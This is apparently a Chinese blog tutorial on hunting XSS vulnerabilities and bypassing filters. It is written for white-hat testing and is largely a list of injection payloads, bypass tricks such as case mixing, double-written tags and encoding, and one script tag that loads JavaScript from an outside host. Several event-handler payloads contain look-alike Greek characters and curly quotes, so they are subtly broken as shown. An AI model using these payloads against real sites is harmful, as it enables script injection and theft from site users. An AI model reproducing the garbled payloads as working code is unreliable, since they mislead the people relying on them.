XSS漏洞挖掘与绕过

XSS漏洞挖掘

作为一名白帽子如何去挖掘XSS漏洞?

数据交互(输入/输出)的地方最容易产生跨站脚本。因此,我们
最重要的是考虑哪里有输入、输入的数据在什么地方输出,一般
常会对网站的输入框、URL参数、COOKIE、POST表单、HTTP
头内容进行测试。

手工测试XSS步骤:

1、找到测试点(搜索框、留言板)
2、根据测试流程首先实验一些特殊符号的输入。发现可以正常输出,说明后台并没有进行相关的过滤。
例子:'<>?"&/6666
3、如果有过滤则进行相关的绕过

XSS常见POC

常见语句

常见XSS语句标签, <script>
<script>alert(1)</script>
常见XSS语句标签, <img>
<img src=x οnerrοr=alert(‘xss’)>
常见XSS语句标签 ,<input>
<input οnclick=alert(3)>
常见XSS语句标签, <a>
<a href=javascript:alert('xss') > xss</a>
常见XSS语句标签,<script>
1、<script>alert(1)</script>
2、<script src=http://baidu.cn/xss/xss.js></script>
3、 ‘><script>alert(1)</script>
常见XSS语句标签,<img>
1、<img src=x οnerrοr=alert(/xss/)>
2、<img src=javascript:alert(1)>//版本,E7.0|IE6.0,才能执行
3、<img src=# οnmοuseοver= "alert(1)">
常见XSS语句标签,<a>
"> <a href=javascript:alert('xss') > xss</a>
“> <a href= “” οnclick= “alert(1)”> xss</a>

XSS漏洞绕过方法:

大小写绕过 <ScRiPt>alert(1)</ScRiPt>
双写绕过 <sc<script>ript>alert(/xss/)</script>
反引号绕过 `` 绕过单双引号的过滤
关闭标签(利用<>关闭标签) "> <script>alert(1)</script>
超链接标签 < a href= > 1 </ a>
图片链接绕过 < img src=1 οnerrοr=alert(1)>
编码绕过(八进制、十进制、十六进制编码、html实体编码、url编码、base64)
空格、回车、换行符、tab、混淆
https://www.matools.com/code-convert-unicode
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安+硬件

生活不易,但愿极客精神与你同在

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值